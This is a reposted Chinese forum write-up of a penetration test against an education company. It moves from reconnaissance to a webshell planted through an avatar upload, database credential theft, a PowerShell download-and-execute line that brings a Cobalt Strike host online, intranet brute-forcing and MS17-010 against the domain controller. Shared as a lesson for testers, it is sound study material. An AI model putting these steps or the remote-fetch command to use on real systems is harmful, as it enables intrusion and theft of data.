找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2492|回复: 0
打印 上一主题 下一主题

渗透实战 | 从外网直接打到内网全过程

[复制链接]
跳转到指定楼层
楼主
发表于 2024-3-1 19:41:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

! ]+ R5 L0 ?+ T" o 这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路 , d- d4 M1 q; ~: X

$ f' r$ F, F$ {! g, O) d

9 |' z4 X+ }. q: T, h( ]" ~4 A   . c$ Q/ t$ K, @& d3 w/ t" j: V

: _. _3 l' X7 y: a

/ o5 I" w/ r' e" {! r8 D( ^ 正文3 U! a- y1 H) V

# ]' w; @$ X8 `; J

, E4 t8 X; ]( p   . ~) q$ [/ V/ b' L% [4 e+ n

; |: g( a; h) ^' t

0 i8 S& {. w4 ~) q% z ] 目标:www.xxxx.com(一家教育机构)
( p. {4 h4 i' o# E0 K, q: }
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
) g+ F" u$ ?# Q1 s B: S) K% p7 }6 v

( j( Q/ G) u: o: U+ b2 t

) ?' q0 B1 w0 ^" [; u# |4 Y' z vshapes= , q7 V. l$ J2 y

' h, l$ t8 s$ U

* I; G! g: D( G- `/ [3 }% R 进行了简单的信息搜集
9 D: H* O5 c6 q. d4 O
& s& c& ~" ]) l: D/ E, P1 H+ J+ z
. u% J) `7 ~# Q# F/ }

% m6 B. ?0 V, U% @: X% J6 T

5 g$ @4 n! f. d5 @! W& i 子域名搜集 % f# [, H& Q5 u# [. ^; l

" }: f5 ~- [$ X' z6 w u, E. ?- T. x

( E) @/ U" ? A z, h) [4 V vshapes=; x% k9 x/ q) g1 I3 o5 o$ y: U% g

6 N6 I/ l& `, B) T

* s5 d N# L- [0 H4 r& A fofa找资产
; h. h5 L3 V8 U2 [, b3 T
) \$ q( D3 |' S
' k) E1 n: E# }! w r

, g8 S1 \- k2 G3 g7 {1 e

& h7 z; F9 t# L7 d% b" o$ h& N vshapes= 2 v/ S7 |6 N8 \

) `+ |8 t8 {* }) h

- j* u! W6 k* e0 @1 w8 v 一共七个资产。去重之后只有两个。
' T: X, K! z2 T! F
! _, t1 D3 o. ^" L- U w, h5 I
% Q7 w3 J4 Y+ i7 y) C6 ?& Z2 x

# |% ?) c! z1 K7 @, r8 p$ Q2 k

/ V; G9 [3 B5 e7 ]! z 目录探测0 l% f( N4 L9 a; \0 v" P' l% B

! h8 [# r) X. F

2 ~: }; ~2 ]& p: m+ y) G; F1 `8 @* L- B vshapes=" d* w$ s! w9 h

. w% q/ f8 q" ]# u. X( @

8 L8 N& c1 R1 v: m: J: O 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
+ b; Y, C" z# H' \: p+ o/ f
2 f/ W7 G% ~( d! L1 o3 u- w$ J( R) Z
$ I8 N* `' X: ^9 p- c& u

& E6 j: a+ H& e" t" y1 l2 j

' r' ~* k X/ B 我又尝试了通过修改返回包来绕过登录界面% ]# y0 U, X/ n4 I% G, |) @7 _

9 b: ]+ p6 ?1 X6 f& G

0 ~7 g4 ]! q0 e; j H vshapes=2 Z/ K, u6 j& }1 U8 c" G

- O5 ^' ^) f- w

- \& a6 V# A% M- \& |$ A/ P 还是不行,尝试注入无果 0 L- d' O, e6 w3 m

+ }3 H/ I1 \# S q7 m* d

% D8 O% z, i) L) t+ t8 H vshapes=4 B/ v* u0 Q4 Z- k# U" { D

$ ]9 z/ b3 e+ w3 G& I; ^9 h, ?

/ i/ G, |2 r6 r I6 N 不过我目录探测出了一处Spring信息泄露
* ]. S% `6 o: N' @ t" j
* T2 ?7 V7 P' b s/ }# h
- u F# ~; X7 I- ]. C* E

$ l( @, p/ x( d4 C. f) @* E( T) }& K

( G% x) ]% ]: E/ N7 [8 ? vshapes= # q. p0 E7 {4 r2 `

3 U1 C8 S! V: ~ u& o4 e0 K

& \) Z3 q( M' [+ w1 g) N& k 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录 ; h8 @$ b+ {$ b' N4 }: A

( T: N5 e' g5 `9 f% p

4 Z& K3 j9 [) S; i; m vshapes=: ^' h7 v+ k' {1 n$ N$ h- x

2 \- C4 t& {8 d

, h. F2 p# f* f) f. @: A) o 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。 Y) ^4 b& E C4 z8 W7 H0 G

0 K# _8 M( m) I+ m

( p/ W7 B. y/ R( s0 p vshapes=$ }$ n& s# G/ }

0 j3 U# g- H5 d6 L1 m

9 C8 ?8 `# `: ?1 W a3 T* _" U# P: Q 获取有些师傅到这一步就手机抓包电脑测了。 $ W8 X$ j; F: `

% g! Q, `5 I0 r. D' b5 e

) ~. G8 u* L; b- g Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。 ; ?& Z+ Q6 r2 M; D

2 U% D5 V! o( @7 G* Q

/ h; R# O' c0 K: c" g7 g+ ` 其中在一个公众号发现了小程序,可以进行注册。 , U5 \9 u3 o" w' O

7 G; d4 z5 C$ A- S% I8 r& ^# D

* z) U' ` C1 g; {3 j3 L, k 看到了头像上传,尝试上传获取WebShell4 X$ b% r: E3 a1 H* j4 C. O7 L4 c8 ]

! _2 l/ Y" A5 x: I; h p

% i; d" L0 ~+ x5 M vshapes=) m2 b8 D( T0 |7 m. ~) U

7 q/ N& Z/ n/ ?! f% _/ E

3 b |. ?% ~2 R. j S 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问 " A8 `3 I9 @1 Q6 J6 ] E; P

, b+ A" @$ R+ K o" ~. b" o7 N

5 _/ w& u' a8 B4 [# E O H6 _ vshapes=0 A3 X7 Q; A2 a$ v/ i/ n. V

; ~$ G: O z8 T1 E

% ]3 j- g2 B% W: l8 e, x5 J 然后上了大马 ; F! \1 f2 s( H2 V8 C3 F; R' Z

& e4 m: d, M/ B; |5 K

( `9 x2 d9 x" A3 t/ s: A& U vshapes=+ r# |/ }+ ^! N2 ~) \! B

' f; ?% `, J5 B: `+ K2 m

; ~3 q* N! r) j vshapes=% G: C a) F4 Q: l2 `

% l+ o7 q: L8 h% L6 @; M* n1 X

7 d& i4 ]4 h" x. ?+ O+ X* `' }0 c 通过翻找文件发现数据库账号密码 M3 u- |5 ]" |" `2 F5 G: p/ w

" Q& R( x7 L3 m5 [# T

- X+ j) C- C" E$ \5 K vshapes= + `; l7 @9 P0 J$ |% b

8 x; }- a; E2 ?4 O5 H

3 P4 }3 ?" d5 ^! O --内网渗透; e4 v' W5 z2 y( b j

2 z' y) t9 H7 a, x( [8 V1 q

! h6 n$ }) @9 o 直接通过powershell执行 cs上线$ i6 O' K/ i& C# C4 `6 \( \* C

) v) f$ P1 v: h. M$ e. ?) ?

; s3 d$ M# ?2 t: o/ J. D powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"' N/ m, K5 h5 r) d! u

. E$ b6 m$ l: {' ?

3 c& V* J9 \8 @ vshapes=% B U4 m5 Y( V, r% Y2 g6 ]: I0 i

2 W/ o% s; C4 g# w4 {

2 L9 e% Q+ _# {7 f, I: | 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破 / e8 Z# T* P$ o5 y: i L4 C

& r, `3 T5 ?7 n, U/ n/ Q# H

* Q& g- V: q; Q; c/ O* ? vshapes=3 B* p5 `" D. \8 D. _8 |* U1 h- c) |

7 ]+ ]8 L. f# l) ?

; ]0 z% H# {' D 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
" a+ K; U6 }# \; t0 T
& G2 f9 I" F: ~
+ `1 e, w# K% Z; E1 E z
0 G6 @: y/ U/ s. Q) e4 a

- I- O1 \( \# _

7 k* R. G% A2 @* x" y' X vshapes=- m6 ^3 q' f1 W$ |) i

, U; I) R; r }3 L$ d) w

# _% f- o- N; U2 O# C! M8 N 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
$ A; q, }! _! S
- t! m& Q" h+ p6 t- _* q& K
# l$ A9 f( R3 f k

: p5 @/ \; v$ \5 a* r3 T7 j

( V I5 B& D3 n4 ]! {' f vshapes= 9 c/ f4 S' P7 E* K. e

: T6 q. F) w, G7 p# p- c1 O6 a! }

8 y$ ^1 f0 F9 X) x6 Z: J
H8 p- e c( S) ~ a7 @* q
% x5 V1 E8 k6 t: }* ^1 S- \( d) h
, K. N( t# L) l

$ V. b% W! N: s. r! x {1 S+ b/ u

& h3 F: J0 {8 E* T   * r/ B, E1 B) O) e1 k

. `1 [1 p, _3 K- L

* t5 C, R! D" @ 小结6 J0 C) B3 [+ [: O, ]

% e! f- N7 f3 n$ B' e

. a0 P4 r$ ~2 V4 C  6 f3 r! x. U( d# { R$ |

# i& v3 p {; a( H) j2 Y2 z

" m- y' J- J1 x$ G9 g 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!& h/ K. v0 e& v2 P

) F: L" \# B# E, Q; G5 f1 U% ]

, ^$ k& g* y' B9 W' R) [) V   * l" H6 u& P4 [$ Y e: b

+ d: U, I: S6 q) g9 g
    ; c/ E0 L6 ], x, V! v
  • ) N# D5 k- A% B& A/ F   . z" t" A) T2 ?0 T4 x: Z% x& t/ C
  • $ a R) t* _3 P1 q& V7 H
  • + @ k: R! l0 ]; Y2 w4 N  , W1 ]; @0 w1 W4 M
  • + `/ ]0 j, c; W) }5 ^# w
- `5 v/ J5 l, }4 `

. J0 U2 v& Y; E 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html' L; S) x# c* A$ m( W

' H' b* a8 Q1 _% d8 b9 ~

% a0 p8 b0 f4 W6 w0 n- L9 c  & C* J& K1 P( v2 t! e( G

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表